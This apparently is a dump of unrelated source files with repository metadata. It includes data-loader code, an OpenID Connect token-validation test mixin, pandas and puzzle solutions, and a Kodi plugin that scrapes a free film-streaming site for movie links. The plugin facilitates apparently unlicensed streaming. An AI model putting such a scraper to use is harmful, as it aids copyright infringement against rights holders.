if args.eval_max_preds_per_seq:
eval_set_args['max_preds_per_seq'] = args.eval_max_preds_per_seq
if args.eval_text_key is not None:
eval_set_args['text_key'] = args.eval_text_key
# make datasets splits and tokenizer
train, valid, test = None, None, None
if args.train_data is not None:
train = data_utils.make_dataset(**data_set_args)
if data_utils.should_split(split):
train, valid, test = train
eval_set_args['tokenizer'] = tokenizer
# make training and val dataset if necessary
if valid is None and args.valid_data is not None:
eval_set_args['path'] = args.valid_data
valid = data_utils.make_dataset(**eval_set_args)
eval_set_args['tokenizer'] = tokenizer
if test is None and args.test_data is not None:
eval_set_args['path'] = args.test_data
test = data_utils.make_dataset(**eval_set_args)
# wrap datasets with data loader
use_block = args.block_lm or args.encoder_decoder
if train is not None and args.batch_size > 0:
train = make_data_loader(train, tokenizer, batch_size, args.train_iters, args, shuffle=args.shuffle,
block_collate=use_block)
args.do_train = True
else:
args.do_train = False
eval_batch_size = eval_batch_size if eval_batch_size != 0 else batch_size
if valid is not None:
valid = make_data_loader(valid, tokenizer, eval_batch_size, args.train_iters, args, shuffle=args.shuffle,
block_collate=use_block)
args.do_valid = True
else:
args.do_valid = False
if test is not None:
test = make_data_loader(test, tokenizer, eval_batch_size, len(test) // eval_batch_size + 1, args,
shuffle=args.shuffle, block_collate=use_block)
args.do_test = True
else:
args.do_test = False
return train, valid, test
def build_multi_task_dataset(args, tokenizer):
task_dirs = {"mnli": "MNLI", "cola": "CoLA", "mrpc": "MRPC", "qnli": "QNLI", "qqp": "QQP", "sst2": "SST-2",
"agnews": "Agnews", "yelp-polarity": "yelp_review_polarity_csv", "yelp-full": "yelp_review_full_csv",
"yahoo": "Yahoo", "squad": "SQuAD", "race": "RACE"}
train, valid = None, None
if mpu.get_model_parallel_rank() == 0:
multi_seq_length = args.seq_length
if args.multi_seq_length is not None:
multi_seq_length = args.multi_seq_length
train_datasets, valid_datasets = [], []
for task in args.multi_task_data:
task = task.lower()
data_dir = os.path.join(args.data_dir, task_dirs[task])
train_datasets.append(
SuperGlueDataset(args, task, data_dir, multi_seq_length, "train", tokenizer, pattern_ensemble=True))
valid_datasets.append(
SuperGlueDataset(args, task, data_dir, multi_seq_length, "dev", tokenizer, pattern_ensemble=True))
train = MultiTaskDataset(args.multi_task_data, train_datasets)
valid = MultiTaskDataset(args.multi_task_data, valid_datasets)
world_size = torch.distributed.get_world_size(group=mpu.get_data_parallel_group())
multi_batch_size = args.batch_size * world_size
if args.multi_batch_size is not None:
multi_batch_size = args.multi_batch_size * world_size
train = make_data_loader(train, tokenizer, multi_batch_size, args.train_iters, args, shuffle=True)
valid = make_data_loader(valid, tokenizer, multi_batch_size, args.train_iters, args, shuffle=True)
return train, valid
def get_split(args):
"""
Get dataset splits from comma separated string list
"""
splits = []
if args.split.find(',') != -1:
splits = [float(s) for s in args.split.split(',')]
elif args.split.find('/') != -1:
splits = [float(s) for s in args.split.split('/')]
else:
splits = [float(args.split)]
split_total = sum(splits)
if split_total < 1.:
splits.append(1 - split_total)
while len(splits) < 3:
splits.append(0.)
splits = splits[:3]
if args.valid_data is not None:
splits[1] = 0.
if args.test_data is not None:
splits[2] = 0.
final_sum = sum(splits)
return [s / final_sum for s in splits]
def configure_data():
"""add cmdline flags for configuring datasets"""
# These are options that are used by data_utils, but are either
# deprecated or not meant to be exposed to the command line user.
# These options are intneded to be set in code by specific scripts.
defaults = {
'world_size': 1,
'rank': -1,
'persist_state': 0,
'lazy': False,
'transpose': False,
'data_set_type': 'supervised',
'seq_length': 256,
'eval_seq_length': 256,
'samples_per_shard': 100
}
return DataConfig(defaults=defaults)
| [
"[email protected]"
] | |
42db9ae5b41d878484401904355a985bab0c7f8d | f998a574343292d050777f616b408a74fde05738 | /eshop_docker/eshop/extra_apps/social_core/tests/backends/open_id_connect.py | 25e6b5db9900819e073facd14c2e6cdb9f222ebc | [] | no_license | Boomshakal/Django | 7987e0572fc902bd56360affea0b5087a4cb04a7 | a149691c472eab3440028bf2460cd992acec0f8a | refs/heads/master | 2023-01-11T06:16:29.283428 | 2022-12-23T08:00:05 | 2022-12-23T08:00:05 | 199,360,433 | 0 | 0 | null | 2020-06-06T09:37:02 | 2019-07-29T02:01:09 | Python | UTF-8 | Python | false | false | 6,334 | py | # -*- coding: utf-8 -*-
from calendar import timegm
import os
import sys
import json
import datetime
import unittest2
try:
from jwkest.jwk import RSAKey, KEYS
from jwkest.jws import JWS
from jwkest.jwt import b64encode_item
NO_JWKEST = False
except ImportError:
NO_JWKEST = True
from httpretty import HTTPretty
sys.path.insert(0, '..')
from ...exceptions import AuthTokenError
class OpenIdConnectTestMixin(object):
"""
Mixin to test OpenID Connect consumers. Inheriting classes should also
inherit OAuth2Test.
"""
client_key = 'a-key'
client_secret = 'a-secret-key'
issuer = None # id_token issuer
openid_config_body = None
key = None
def setUp(self):
super(OpenIdConnectTestMixin, self).setUp()
test_root = os.path.dirname(os.path.dirname(__file__))
self.key = RSAKey(kid='testkey').load(os.path.join(test_root, 'testkey.pem'))
HTTPretty.register_uri(HTTPretty.GET,
self.backend.OIDC_ENDPOINT + '/.well-known/openid-configuration',
status=200,
body=self.openid_config_body
)
oidc_config = json.loads(self.openid_config_body)
def jwks(_request, _uri, headers):
ks = KEYS()
ks.add(self.key.serialize())
return 200, headers, ks.dump_jwks()
HTTPretty.register_uri(HTTPretty.GET,
oidc_config.get('jwks_uri'),
status=200,
body=jwks)
def extra_settings(self):
settings = super(OpenIdConnectTestMixin, self).extra_settings()
settings.update({
'SOCIAL_AUTH_{0}_KEY'.format(self.name): self.client_key,
'SOCIAL_AUTH_{0}_SECRET'.format(self.name): self.client_secret,
'SOCIAL_AUTH_{0}_ID_TOKEN_DECRYPTION_KEY'.format(self.name):
self.client_secret
})
return settings
def access_token_body(self, request, _url, headers):
"""
Get the nonce from the request parameters, add it to the id_token, and
return the complete response.
"""
nonce = self.backend.data['nonce'].encode('utf-8')
body = self.prepare_access_token_body(nonce=nonce)
return 200, headers, body
def get_id_token(self, client_key=None, expiration_datetime=None,
issue_datetime=None, nonce=None, issuer=None):
"""
Return the id_token to be added to the access token body.
"""
return {
'iss': issuer,
'nonce': nonce,
'aud': client_key,
'azp': client_key,
'exp': expiration_datetime,
'iat': issue_datetime,
'sub': '1234'
}
def prepare_access_token_body(self, client_key=None, tamper_message=False,
expiration_datetime=None,
issue_datetime=None, nonce=None,
issuer=None):
"""
Prepares a provider access token response. Arguments:
client_id -- (str) OAuth ID for the client that requested
authentication.
expiration_time -- (datetime) Date and time after which the response
should be considered invalid.
"""
body = {'access_token': 'foobar', 'token_type': 'bearer'}
client_key = client_key or self.client_key
now = datetime.datetime.utcnow()
expiration_datetime = expiration_datetime or \
(now + datetime.timedelta(seconds=30))
issue_datetime = issue_datetime or now
nonce = nonce or 'a-nonce'
issuer = issuer or self.issuer
id_token = self.get_id_token(
client_key, timegm(expiration_datetime.utctimetuple()),
timegm(issue_datetime.utctimetuple()), nonce, issuer)
body['id_token'] = JWS(id_token, jwk=self.key, alg='RS256').sign_compact()
if tamper_message:
header, msg, sig = body['id_token'].split('.')
id_token['sub'] = '1235'
msg = b64encode_item(id_token).decode('utf-8')
body['id_token'] = '.'.join([header, msg, sig])
return json.dumps(body)
def authtoken_raised(self, expected_message, **access_token_kwargs):
self.access_token_body = self.prepare_access_token_body(
**access_token_kwargs
)
with self.assertRaisesRegexp(AuthTokenError, expected_message):
self.do_login()
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_signature(self):
self.authtoken_raised(
'Token error: Signature verification failed',
tamper_message=True
)
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_expired_signature(self):
expiration_datetime = datetime.datetime.utcnow() - \
datetime.timedelta(seconds=30)
self.authtoken_raised('Token error: Signature has expired',
expiration_datetime=expiration_datetime)
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_issuer(self):
self.authtoken_raised('Token error: Invalid issuer',
issuer='someone-else')
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_audience(self):
self.authtoken_raised('Token error: Invalid audience',
client_key='someone-else')
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_issue_time(self):
expiration_datetime = datetime.datetime.utcnow() - \
datetime.timedelta(hours=1)
self.authtoken_raised('Token error: Incorrect id_token: iat',
issue_datetime=expiration_datetime)
@unittest2.skipIf(NO_JWKEST, 'No Jwkest installed')
def test_invalid_nonce(self):
self.authtoken_raised(
'Token error: Incorrect id_token: nonce',
nonce='something-wrong'
)
| [
"[email protected]"
] | |
f82fa05a647d060994f1394b769def3f788dcc39 | 0eaf0d3f0e96a839f2ef37b92d4db5eddf4b5e02 | /abc274/b.py | 1f18cd915d905546bb897ac0c9a184c714fb9018 | [] | no_license | silphire/atcoder | b7b02798a87048757745d99e8564397d1ca20169 | f214ef92f13bc5d6b290746d5a94e2faad20d8b0 | refs/heads/master | 2023-09-03T17:56:30.885166 | 2023-09-02T14:16:24 | 2023-09-02T14:16:24 | 245,110,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | h, w = map(int, input().split())
cc = [
input().rstrip()
for _ in range(h)
]
xx = [0] * w
for x in range(w):
for y in range(h):
if cc[y][x] == '#':
xx[x] += 1
print(*xx) | [
"[email protected]"
] | |
325eb1dbf06a23dc59d7f10da7867ee273d97c26 | 0cbc02dd7d1efbe61de04dcf1c6eccb6496bf074 | /month05/teacher/day02/demo03_dataframe.py | f25546461a98a1a27fa428c2ff04b2b73a91f7a7 | [] | no_license | fsym-fs/Python_AID | 0b1755c15e20b214940041e81bedb2d5ec99e3f9 | f806bb02cdb1670cfbea6e57846abddf3972b73b | refs/heads/master | 2021-03-20T06:57:45.441245 | 2020-05-27T14:13:45 | 2020-05-27T14:13:45 | 247,187,064 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,871 | py | """
demo03_dataFrame.py
"""
import pandas as pd
import numpy as np
df = pd.DataFrame()
print(df)
# 通过列表创建DataFrame
data = ['王伟超', '王小超', '王大超', '王年轻超']
df = pd.DataFrame(data)
print(df)
data = [['Alex',10],['Bob',12],['Clarke',13]]
df = pd.DataFrame(data, index=['S01', 'S02', 'S03'], columns=['Name', 'Age'])
print(df)
data = [{'a': 1, 'b': 2},{'a': 5, 'b': 10, 'c': 20}]
df = pd.DataFrame(data)
print(df)
# 通过字典创建DataFrame
data = {'Name':['Tom', 'Jack', 'Steve', 'Ricky'],'Age':[28,34,29,42]}
df = pd.DataFrame(data)
print(df)
print(df.axes)
print(df.index)
print(df.columns)
print(df.values)
print(df.head(2))
print(df.tail(2))
# 列访问
print('-' * 50)
d = {'one' : pd.Series([1, 2, 3], index=['a', 'b', 'c']),
'two' : pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd']),
'three' : pd.Series([1, 3, 4], index=['a', 'c', 'd'])}
df = pd.DataFrame(d)
print(df['one']) # 访问one这一列
print(df[['one', 'three']])
print(df[df.columns[:2]])
# 列添加
print('-' * 50)
# df['four'] = pd.Series([1, 2, 3, 4], index=['a', 'b', 'c', 'd'])
# df['four'] = pd.Series([1, 2, 3, 4])
# df['four'] = [1, 2, 3, 4]
# df['four'] = [1, 2, 3]
df['four'] = pd.Series([1, 2, 3], index=['b', 'c', 'd'])
print(df)
# 列删除
# print('-' * 50)
# del(df['four'])
# df.pop('one')
# df2 = df.drop(['one', 'three'], axis=1)
# print(df2)
# 行访问
print('-' * 50)
print(df.loc['a'])
print(df.loc[['a', 'b']])
print(df.loc['a':'c']) # 标签索引切片,结果中包含a b c
print(df.iloc[[0, 2]])
print(df.iloc[0:2]) # 数字索引切片,结果中包含a b
# 行添加
print('-' * 50)
print(df)
newline = pd.Series([2.2, 3.1, 4.5, 3.2], index=['one', 'two', 'three', 'four'], name='e')
df = df.append(newline)
print(df)
df = df.append(df)
print(df)
# 索引有重复的情况,希望重建索引
df.index = np.arange(10)
print(df)
# 行的删除
df = df.drop(np.arange(4, 10))
print(df)
# dataFrame元素的访问
print(df.loc[2]['four'])
print(df.loc[2, 'four'])
print(df['four'][2])
print(df.loc[2:2].loc[2, 'four'])
# 复合索引
# random.normal() 返回一组服从正态分布随机数,shape:(6,3), 期望85, 标准差为3
data = np.floor(np.random.normal(85, 3, (6,3)))
df = pd.DataFrame(data)
print('-' * 50)
print(df)
# 把行级索引改为复合索引
mindex = [('classA', 'F'), ('classA', 'M'),
('classB', 'F'), ('classB', 'M'),
('classC', 'F'), ('classC', 'M')]
df.index = pd.MultiIndex.from_tuples(mindex)
# 把列级索引改为复合索引
mindex = [('Age', '20+'), ('Age', '25+'), ('Age', '30+')]
df.columns = pd.MultiIndex.from_tuples(mindex)
print(df)
# 通过复合索引访问元素
print(df.loc['classA', 'F']['Age'])
print(df['Age', '30+']) | [
"[email protected]"
] | |
c02b81dbf0c54de6a19bd9b9039bd4f20831c548 | f435b177d625e50bb9beafb191e1df01e3cb30ee | /src/pyoiler/problems/euler015.py | c9d24f4b6a0d172559219d2b5607eca2cbc11049 | [] | no_license | bathcat/pyOiler | dcf948b0a18a9094314564d177c7827c875de78b | 3ce4d96277e61346509c2975a0034fb5ba845f23 | refs/heads/main | 2023-03-12T10:42:48.837126 | 2021-02-10T19:18:14 | 2021-02-10T19:18:14 | 337,828,844 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,357 | py | from typing import Iterable, Tuple
from ..shared.more_itertools import flat_map, count
from ..shared.solver import Solver
"""[summary]
2 thoughts on performance:
1. This *enumerates* paths, which isn't necessary.
All we need to do is count them, so just increment
a number when you get to 16,16, and forget about
holding on to the tail.
2. Adding threads should be trivial, especially
after changing the search to depth-first.
Returns:
[type]: [description]
Yields:
[type]: [description]
"""
Position = Tuple[int,int]
class Path():
head:Position
tail: 'Path'
def __init__(self, end:Position, rest:'Path' = None):
self.head = end
self.tail = rest
def to_positions(self) -> Iterable[Position]:
yield self.head
if self.tail:
yield from self.tail.to_positions()
def append(self, p:Position) -> 'Path':
return Path(p, self)
def __str__(self):
ps = list(self.to_positions())
ps.reverse()
return str(ps)
@classmethod
def zero(cls) -> 'Path':
return Path((0,0))
class Lattice():
height:int
width:int
def __init__(self,width, height):
self.width=width
self.height=height
def successor_paths(self, current:Path) -> Iterable[Path]:
if current.head[0] < self.width:
yield current.append((current.head[0] + 1, current.head[1]))
if current.head[1] < self.height:
yield current.append((current.head[0], current.head[1] + 1))
def paths(self) -> Iterable[Path]:
partials = [Path.zero()]
for _ in range(self.height + self.width):
partials = flat_map(self.successor_paths, partials)
return partials
def _solve(print = print):
side = 15
l = Lattice(side,side)
path_count = count(l.paths())
print(f"Count of paths through a {side} lattice is: {path_count}")
print('This approach doesn''t scale.')
return False
description = '''Starting in the top left corner of a 2×2 grid, and only being able to move to the right and down,
there are exactly 6 routes to the bottom right corner.
How many such routes are there through a 20×20 grid?
'''
solver = Solver(15,
'Lattice paths',
description,
_solve
)
| [
"[email protected]"
] | |
0f65babd63124bdd8131d36882d73b9b9ea8f77e | ad59fb12042bfd3f5c43eca057d0f747f9e148cf | /Se2iP/usr/lib/enigma2/python/Plugins/Extensions/IPTVPlayer/tsiplayer/addons/resources/sites/enstream.py | ebd1c92b5ec4b69402b4e26a91e58348b7cf1fb3 | [] | no_license | lexlong2007/eePlugins | d62b787100a7069ad5713a47c5688008063b45ec | 167b262fe36901a2d3a2fae6d0f85e2307b3eff7 | refs/heads/master | 2022-03-09T05:37:37.567937 | 2022-02-27T01:44:25 | 2022-02-27T01:44:25 | 253,012,126 | 0 | 0 | null | 2020-04-04T14:03:29 | 2020-04-04T14:03:29 | null | UTF-8 | Python | false | false | 13,438 | py | # -*- coding: utf-8 -*-
# vStream https://github.com/Kodi-vStream/venom-xbmc-addons
import re
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib import xbmc
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.gui.hoster import cHosterGui
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.gui.gui import cGui
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.handler.inputParameterHandler import cInputParameterHandler
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.handler.outputParameterHandler import cOutputParameterHandler
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.handler.requestHandler import cRequestHandler
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.parser import cParser
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.util import Unquote
from Plugins.Extensions.IPTVPlayer.tsiplayer.addons.resources.lib.comaddon import progress
SITE_IDENTIFIER = 'enstream'
SITE_NAME = 'Enstream'
SITE_DESC = 'Regarder tous vos films streaming complets, gratuit et illimité'
URL_MAIN = 'https://www.enstream.club/'
FUNCTION_SEARCH = 'showMovies'
URL_SEARCH = ('', FUNCTION_SEARCH)
URL_SEARCH_MOVIES = (URL_SEARCH[0], FUNCTION_SEARCH)
MOVIE_MOVIE = (True, 'load')
MOVIE_NEWS = (URL_MAIN + 'films-streaming/', 'showMovies')
MOVIE_GENRES = (True, 'showGenres')
MOVIE_ANNEES = (True, 'showYears')
MOVIE_LIST = (True, 'showAlpha')
def load():
oGui = cGui()
oOutputParameterHandler = cOutputParameterHandler()
oOutputParameterHandler.addParameter('siteUrl', URL_SEARCH[0])
oGui.addDir(SITE_IDENTIFIER, 'showSearch', 'Recherche', 'search.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_NEWS[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_NEWS[1], 'Films (Derniers ajouts)', 'news.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_GENRES[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_GENRES[1], 'Films (Genres)', 'genres.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_ANNEES[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_ANNEES[1], 'Films (Par années)', 'annees.png', oOutputParameterHandler)
oOutputParameterHandler.addParameter('siteUrl', MOVIE_LIST[0])
oGui.addDir(SITE_IDENTIFIER, MOVIE_LIST[1], 'Films (Ordre alphabétique)', 'listes.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showSearch():
oGui = cGui()
sSearchText = oGui.showKeyBoard()
if (sSearchText != False):
showMovies(sSearchText)
oGui.setEndOfDirectory()
return
def showGenres():
oGui = cGui()
liste = []
liste.append(['Action', URL_MAIN + 'genre/action/'])
liste.append(['Animation', URL_MAIN + 'genre/animation/'])
liste.append(['Aventure', URL_MAIN + 'genre/aventure/'])
liste.append(['Biopic', URL_MAIN + 'genre/biopic/'])
liste.append(['Comédie', URL_MAIN + 'genre/comedie/'])
liste.append(['Comédie Dramatique', URL_MAIN + 'genre/comedie-dramatique/'])
liste.append(['Comédie Musicale', URL_MAIN + 'genre/comedie-musical/'])
liste.append(['Drame', URL_MAIN + 'genre/drame/'])
liste.append(['Epouvante Horreur', URL_MAIN + 'genre/epouvante-horreur/'])
liste.append(['Espionnage', URL_MAIN + 'genre/espionnage/'])
liste.append(['Famille', URL_MAIN + 'genre/famille/'])
liste.append(['Fantastique', URL_MAIN + 'genre/fantastique/'])
liste.append(['Guerre', URL_MAIN + 'genre/guerre/'])
liste.append(['Historique', URL_MAIN + 'genre/historique/'])
liste.append(['Judiciaire', URL_MAIN + 'genre/judiciaire/'])
liste.append(['Musical', URL_MAIN + 'genre/musical/'])
liste.append(['Péplum', URL_MAIN + 'genre/peplum/'])
liste.append(['Policier', URL_MAIN + 'genre/policier/'])
liste.append(['Romance', URL_MAIN + 'genre/romance/'])
liste.append(['Science Fiction', URL_MAIN + 'genre/science-fiction/'])
liste.append(['Thriller', URL_MAIN + 'genre/thriller/'])
liste.append(['Western', URL_MAIN + 'genre/western/'])
oOutputParameterHandler = cOutputParameterHandler()
for sTitle, sUrl in liste:
oOutputParameterHandler.addParameter('siteUrl', sUrl)
oGui.addDir(SITE_IDENTIFIER, 'showMovies', sTitle, 'genres.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showYears():
oGui = cGui()
oOutputParameterHandler = cOutputParameterHandler()
for i in reversed(range(1942, 2022)):
Year = str(i)
oOutputParameterHandler.addParameter('siteUrl', URL_MAIN + 'Annee/' + Year)
oGui.addDir(SITE_IDENTIFIER, 'showMovies', Year, 'annees.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showAlpha():
oGui = cGui()
sUrl = URL_MAIN + 'ABC/'
liste = [['0-9', sUrl], ['A', sUrl + 'A'], ['B', sUrl + 'B'], ['C', sUrl + 'C'], ['D', sUrl + 'D'],
['E', sUrl + 'E'], ['F', sUrl + 'F'], ['G', sUrl + 'G'], ['H', sUrl + 'H'], ['I', sUrl + 'I'],
['J', sUrl + 'J'], ['K', sUrl + 'K'], ['L', sUrl + 'L'], ['M', sUrl + 'M'], ['N', sUrl + 'N'],
['O', sUrl + 'O'], ['P', sUrl + 'P'], ['Q', sUrl + 'Q'], ['R', sUrl + 'R'], ['S', sUrl + 'S'],
['T', sUrl + 'T'], ['U', sUrl + 'U'], ['V', sUrl + 'V'], ['W', sUrl + 'W'], ['X', sUrl + 'X'],
['Y', sUrl + 'Y'], ['Z', sUrl + 'Z']]
oOutputParameterHandler = cOutputParameterHandler()
for sTitle, sUrl in liste:
oOutputParameterHandler.addParameter('siteUrl', sUrl)
oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Lettre [COLOR coral]' + sTitle + '[/COLOR]', 'listes.png', oOutputParameterHandler)
oGui.setEndOfDirectory()
def showMovies(sSearch=''):
oGui = cGui()
if sSearch:
sUrl = URL_MAIN + 'search.php'
oRequestHandler = cRequestHandler(sUrl)
oRequestHandler.setRequestType(cRequestHandler.REQUEST_TYPE_POST)
oRequestHandler.addParameters('q', Unquote(sSearch))
else:
oInputParameterHandler = cInputParameterHandler()
sUrl = oInputParameterHandler.getValue('siteUrl')
oRequestHandler = cRequestHandler(sUrl)
oRequestHandler.addHeaderEntry('Referer', URL_MAIN)
sHtmlContent = oRequestHandler.request()
if sSearch:
sPattern = '<a href="([^"]+).+?url\((.+?)\).+?<div class="title"> (.+?) </div>'
elif 'Annee/' in sUrl or '/ABC' in sUrl:
sPattern = '<div class="table-movies-content.+?href="([^"]+).+?url\((.+?)\).+?<.i>.([^<]+)'
elif 'genre/' in sUrl:
sPattern = 'film-uno.+?href="([^"]+).+?data-src="([^"]+).+?alt="([^"]+)'
else:
sPattern = 'class="film-uno".+?href="([^"]+).+?data-src="([^"]+).+?alt="([^"]+).+?min.+?·([^<]+).+?short-story">([^<]*)'
oParser = cParser()
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == False):
oGui.addText(SITE_IDENTIFIER)
if (aResult[0] == True):
total = len(aResult[1])
progress_ = progress().VScreate(SITE_NAME)
oOutputParameterHandler = cOutputParameterHandler()
for aEntry in aResult[1]:
progress_.VSupdate(progress_, total)
if progress_.iscanceled():
break
sUrl = aEntry[0]
sThumb = aEntry[1]
sTitle = aEntry[2]
sDesc = ''
if len(aEntry) > 3:
if xbmc.getInfoLabel('system.buildversion')[0:2] >= '19':
sQual = aEntry[3].split('·')[1].replace('Â', '').strip()
sLang = aEntry[3].split('·')[2].strip()
else:
sQual = aEntry[3].split('·')[1].strip()
sLang = aEntry[3].split('·')[2].strip()
sDesc = aEntry[4]
sDisplayTitle = ('%s [%s] (%s)') % (sTitle, sQual, sLang)
else:
sDisplayTitle = sTitle
oOutputParameterHandler.addParameter('siteUrl', sUrl)
oOutputParameterHandler.addParameter('sMovieTitle', sTitle)
oOutputParameterHandler.addParameter('sThumb', sThumb)
oOutputParameterHandler.addParameter('sDesc', sDesc)
oGui.addMovie(SITE_IDENTIFIER, 'showHoster', sDisplayTitle, '', sThumb, sDesc, oOutputParameterHandler)
progress_.VSclose(progress_)
if not sSearch:
sNextPage, sPaging = __checkForNextPage(sHtmlContent)
if (sNextPage != False):
oOutputParameterHandler = cOutputParameterHandler()
oOutputParameterHandler.addParameter('siteUrl', sNextPage)
# sNumPage = re.search('(page|genre).*?[-=\/]([0-9]+)', sNextPage).group(2) # ou replace'.html',''; '([0-9]+)$'
oGui.addNext(SITE_IDENTIFIER, 'showMovies', 'Page ' + sPaging, oOutputParameterHandler)
oGui.setEndOfDirectory()
def __checkForNextPage(sHtmlContent):
oParser = cParser()
sPattern = 'class=\'Paginaactual\'.+?a href=\'([^"]+?)\'.+?>([^<]+)</a></li></ul'
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == True):
sNextPage = URL_MAIN[:-1] + aResult[1][0][0]
sNumberMax = aResult[1][0][1]
sNumberNext = re.search('(page|genre).*?[-=\/]([0-9]+)', sNextPage).group(2)
sPaging = sNumberNext + '/' + sNumberMax
return sNextPage, sPaging
sPattern = '<span>\d+</span>.+?href=\'([^"]+?)\'.+?>([^<]+)</a></li></ul'
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == True):
sNextPage = URL_MAIN[:-1] + aResult[1][0][0]
sNumberMax = aResult[1][0][1]
sNumberNext = re.search('(page|genre).*?[-=\/]([0-9]+)', sNextPage).group(2)
sPaging = sNumberNext + '/' + sNumberMax
return sNextPage, sPaging
return False, 'none'
def showHoster():
oGui = cGui()
oInputParameterHandler = cInputParameterHandler()
sUrl = oInputParameterHandler.getValue('siteUrl')
sThumb = oInputParameterHandler.getValue('sThumb')
sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')
sDesc = oInputParameterHandler.getValue('sDesc')
oParser = cParser()
oRequestHandler = cRequestHandler(sUrl)
sHtmlContent = oRequestHandler.request()
sPattern = 'data-url="([^"]+)".+?data-code="([^"]+)".+?mobile">([^<]+)'
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == False):
oGui.addText(SITE_IDENTIFIER)
if (aResult[0] == True):
oOutputParameterHandler = cOutputParameterHandler()
for aEntry in aResult[1]:
sDataUrl = aEntry[0]
sDataCode = aEntry[1]
sHost = aEntry[2].capitalize()
# filtrage des hosters
oHoster = cHosterGui().checkHoster(sHost)
if not oHoster:
continue
sTitle = ('%s [COLOR coral]%s[/COLOR]') % (sMovieTitle, sHost)
lien = URL_MAIN + 'video/' + sDataCode + '/recaptcha/' + sDataUrl
oOutputParameterHandler.addParameter('sMovieTitle', sMovieTitle)
oOutputParameterHandler.addParameter('sThumb', sThumb)
oOutputParameterHandler.addParameter('siteUrl', lien)
oOutputParameterHandler.addParameter('referer', sUrl)
oGui.addLink(SITE_IDENTIFIER, 'showHostersLinks', sTitle, sThumb, sDesc, oOutputParameterHandler)
sPattern = "class=.download.+?href='/([^']*).+?mobile.>([^<]+)"
aResult = oParser.parse(sHtmlContent, sPattern)
if (aResult[0] == False):
oGui.addText(SITE_IDENTIFIER)
if (aResult[0] == True):
oOutputParameterHandler = cOutputParameterHandler()
for aEntry in aResult[1]:
lien = URL_MAIN + aEntry[0]
sHost = aEntry[1].capitalize()
oHoster = cHosterGui().checkHoster(sHost)
if not oHoster:
continue
sTitle = ('%s [COLOR coral]%s[/COLOR]') % (sMovieTitle, sHost)
oOutputParameterHandler.addParameter('sMovieTitle', sMovieTitle)
oOutputParameterHandler.addParameter('sThumb', sThumb)
oOutputParameterHandler.addParameter('siteUrl', lien)
oOutputParameterHandler.addParameter('referer', sUrl)
oGui.addLink(SITE_IDENTIFIER, 'showHostersLinks', sTitle, sThumb, sDesc, oOutputParameterHandler)
oGui.setEndOfDirectory()
def showHostersLinks():
oGui = cGui()
oInputParameterHandler = cInputParameterHandler()
sUrl = oInputParameterHandler.getValue('siteUrl')
sMovieTitle = oInputParameterHandler.getValue('sMovieTitle')
sThumb = oInputParameterHandler.getValue('sThumb')
referer = oInputParameterHandler.getValue('referer')
oRequestHandler = cRequestHandler(sUrl)
oRequestHandler.addHeaderEntry('Referer', referer)
oRequestHandler.request()
sHosterUrl = oRequestHandler.getRealUrl()
oHoster = cHosterGui().checkHoster(sHosterUrl)
if (oHoster != False):
oHoster.setDisplayName(sMovieTitle)
oHoster.setFileName(sMovieTitle)
cHosterGui().showHoster(oGui, oHoster, sHosterUrl, sThumb)
oGui.setEndOfDirectory()
| [
"[email protected]"
] | |
0bf08e9a43aaf6b9a2ef34639ca2ac9cc2f35030 | 6478723d180a8ef39941ba04b80c1eca9f437323 | /Premuim/1134. Armstrong Number.py | 5e3cf31015b6a7071c89cb6029a027521886b866 | [] | no_license | NiuNiu-jupiter/Leetcode | 2a49a365898ecca393cb1eb53a47f4501b25952d | e278ae6ded32f6a2d054ae11ad8fcc45e7bd0f86 | refs/heads/master | 2022-11-22T01:05:57.417538 | 2020-07-28T23:34:39 | 2020-07-28T23:34:39 | 182,104,119 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | """
The k-digit number N is an Armstrong number if and only if the k-th power of each digit sums to N.
Given a positive integer N, return true if and only if it is an Armstrong number.
Example 1:
Input: 153
Output: true
Explanation:
153 is a 3-digit number, and 153 = 1^3 + 5^3 + 3^3.
Example 2:
Input: 123
Output: false
Explanation:
123 is a 3-digit number, and 123 != 1^3 + 2^3 + 3^3 = 36.
Note:
1 <= N <= 10^8
"""
class Solution:
def isArmstrong(self, N: int) -> bool:
target = N
mi = len(str(target))
res ,digit = 0, 0
while N > 0:
digit = N % 10
res += digit**mi
N //= 10
return res == target
| [
"[email protected]"
] | |
0da148c12136dd8d13acd43683cee98ce7199904 | c03d102d36ff21675ec3bb58e5d46af8c3f73ff6 | /polyaxon/tracker/events/job.py | 0e0cac80c31b9515316660fd5e0da98b98625c6c | [
"MIT"
